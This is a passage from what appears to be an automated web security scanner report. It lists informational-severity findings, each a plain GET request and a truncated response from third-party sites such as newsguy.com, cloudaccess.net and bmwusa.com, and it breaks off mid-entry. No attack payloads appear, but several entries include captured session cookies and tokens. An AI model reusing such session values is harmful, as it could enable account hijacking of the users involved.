Host:   https://acc.newsguy.com
Path:   /user/accnt_renew

Request

GET /user/accnt_renew HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:39 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=H7MjtTwyFzdgi1ol1ako0emqopp0oWW0L4d3d9453; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Renew Account</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftmargi
...[SNIP]...

28.19. https://acc.newsguy.com/user/accnt_settings

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_settings

Request

GET /user/accnt_settings HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:37 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=C378.xjGh8DpywVURU2nsemaopp0oWW0L4d3d9451; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Account Settings</TITLE>
<script src="/accnt_forms.js"></script>
<script language="JavaScript">
<!-- calculate available quotas by values type in
...[SNIP]...

28.20. https://acc.newsguy.com/user/accnt_signup_usenet

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_signup_usenet

Request

GET /user/accnt_signup_usenet HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:45 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=dLOXayhNSH0bYlx_7dbu1emqopp0oWW0L4d3d9459; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Add a Usenet Account</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" le
...[SNIP]...

28.21. https://acc.newsguy.com/user/accnt_upgrade

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_upgrade

Request

GET /user/accnt_upgrade HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:42 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=F1xwYpJIfeFc7m0gMa_onemKopp0oWW0L4d3d9456; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Upgrade My Account</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" left
...[SNIP]...

28.22. https://bugzilla.mozilla.org/show_bug.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://bugzilla.mozilla.org
Path:   /show_bug.cgi

Request

GET /show_bug.cgi HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pm-app-bugs03
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Mon, 24 Jan 2011 22:30:20 GMT
Keep-Alive: timeout=300, max=1000
Connection: close
Content-Length: 11817

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Search by bug number</title>



...[SNIP]...

28.23. https://cloudaccess.infusionsoft.com/AddForms/processFormSecure.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cloudaccess.infusionsoft.com
Path:   /AddForms/processFormSecure.jsp

Request

GET /AddForms/processFormSecure.jsp HTTP/1.1
Host: cloudaccess.infusionsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=00DE583E28DB9D9872BB85A1D8248900; Path=/; Secure
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 24 Jan 2011 15:01:55 GMT
Connection: close
Content-Length: 939


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<meta http-equiv="X-UA-Compatibl
...[SNIP]...

28.24. https://github.com/DataSift/TweetMeme-Chrome-Extension

Summary

Severity:   Information
Confidence:   Certain
Host:   https://github.com
Path:   /DataSift/TweetMeme-Chrome-Extension

Request

GET /DataSift/TweetMeme-Chrome-Extension HTTP/1.1
Host: github.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 15:00:34 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "ed993b0b64e19e7dbc6254707982dc48"
X-Runtime: 124ms
Content-Length: 40811
Set-Cookie: csrf_id=17b8d0887bd3f6e545eb80196d7df266; path=/
Set-Cookie: _gh_sess=BAh7BzoRbG9jYWxlX2d1ZXNzIgdlbiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%3D%3D--e0bd7516c66d61afc1315d8c70aa3e9910534a77; path=/; expires=Fri, 01 Jan 2021 00:00:00 GMT; secure; HttpOnly
Cache-Control: private, max-age=0, must-revalidate


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="e
...[SNIP]...

28.25. https://hostedusa3.whoson.com/chat/chatstart.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hostedusa3.whoson.com
Path:   /chat/chatstart.htm

Request

GET /chat/chatstart.htm?domain=stalker.opticalcorp.com HTTP/1.1
Host: hostedusa3.whoson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 13 May 2010 08:48:10 GMT
Accept-Ranges: bytes
ETag: "041ab379f2ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 14:57:16 GMT
Connection: close
Content-Length: 1796

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="C
...[SNIP]...

28.26. https://maps-api-ssl.google.com/maps

Summary

Severity:   Information
Confidence:   Certain
Host:   https://maps-api-ssl.google.com
Path:   /maps

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:40:49 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=15465537720298b3:TM=1295908849:LM=1295908849:S=eCJvLriWDbsm79ao; expires=Wed, 23-Jan-2013 22:40:49 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...

28.27. https://maps-api-ssl.google.com/maps/api/js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://maps-api-ssl.google.com
Path:   /maps/api/js

Request

GET /maps/api/js HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Language
Date: Mon, 24 Jan 2011 22:40:52 GMT
Server: mafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Connection: close

alert("The Google Maps API server rejected your request. The \x22sensor\x22 parameter specified in the request must be set to either \x22true\x22 or \x22false\x22.")

28.28. https://spreadsheets0.google.com/embeddedform

Summary

Severity:   Information
Confidence:   Certain
Host:   https://spreadsheets0.google.com
Path:   /embeddedform

Request

GET /embeddedform?formkey=dEs0YWVVdGdhd05ZeFpYQXNtcU5uN0E6MQ HTTP/1.1
Host: spreadsheets0.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 25 Jan 2011 13:18:41 GMT
Expires: Tue, 25 Jan 2011 13:18:41 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="Content-type" content="text/html; charset=utf-8">
<title>Site Removal, Redaction
...[SNIP]...

28.29. https://www.bmwusa.com/Secured/FrameCheck.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /Secured/FrameCheck.aspx

Request

GET /Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRkCmPwLZUcLGZgDQHB8EPuhdoa0MPkaYA89q2t3SYnOPa5KKaEJetjbTyfZfMtY2xdvcsAnZc8dTtALIF8A6taA21A83dHV0yvREQ9ZYi5DIqu7lJZdzAn3pLdhHpLkWqw== HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=PC#1295637745501-300919.17#1296864738|check#true#1295655198|session#1295655081531-668160#1295656998

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 15:12:50 GMT
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=hwiose4551oubw55xmxold55; path=/; HttpOnly
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:32:50 GMT;path=/
Content-Length: 893


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title><
...[SNIP]...

28.30. https://www.cloudaccess.net/copyright-policy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cloudaccess.net
Path:   /copyright-policy.html

Request

GET /copyright-policy.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.3.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:43 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Last-Modified: Wed, 30 Jun 2010 18:23:53 GMT
Expires: Mon, 24 Jan 2011 16:19:44 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

28.31. https://www.cloudaccess.net/network-report.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cloudaccess.net
Path:   /network-report.html

Request

GET /network-report.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.3.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:44 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Last-Modified: Thu, 23 Dec 2010 04:28:12 GMT
Expires: Mon, 24 Jan 2011 16:19:44 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

28.32. https://www.cloudaccess.net/network-sla.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cloudaccess.net
Path:   /network-sla.html

Request

GET /network-sla.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.3.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:46 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
Last-Modified: Tue, 30 Nov 1999 06:00:00 GMT
Expires: Mon, 24 Jan 2011 16:19:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

28.33. https://www.cloudaccess.net/privacy-policy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cloudaccess.net
Path:   /privacy-policy.html

Request

GET /privacy-policy.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.3.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:41 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:40 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Last-Modified: Wed, 30 Jun 2010 17:55:06 GMT
Expires: Mon, 24 Jan 2011 16:19:41 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

28.34. https://www.cloudaccess.net/support-sla.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cloudaccess.net
Path:   /support-sla.html

Request

GET /support-sla.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.3.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:47 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
Last-Modified: Mon, 22 Nov 2010 16:52:12 GMT
Expires: Mon, 24 Jan 2011 16:19:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

28.35. https://www.cloudaccess.net/terms-of-service.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cloudaccess.net
Path:   /terms-of-service.html

Request

GET /terms-of-service.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.3.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

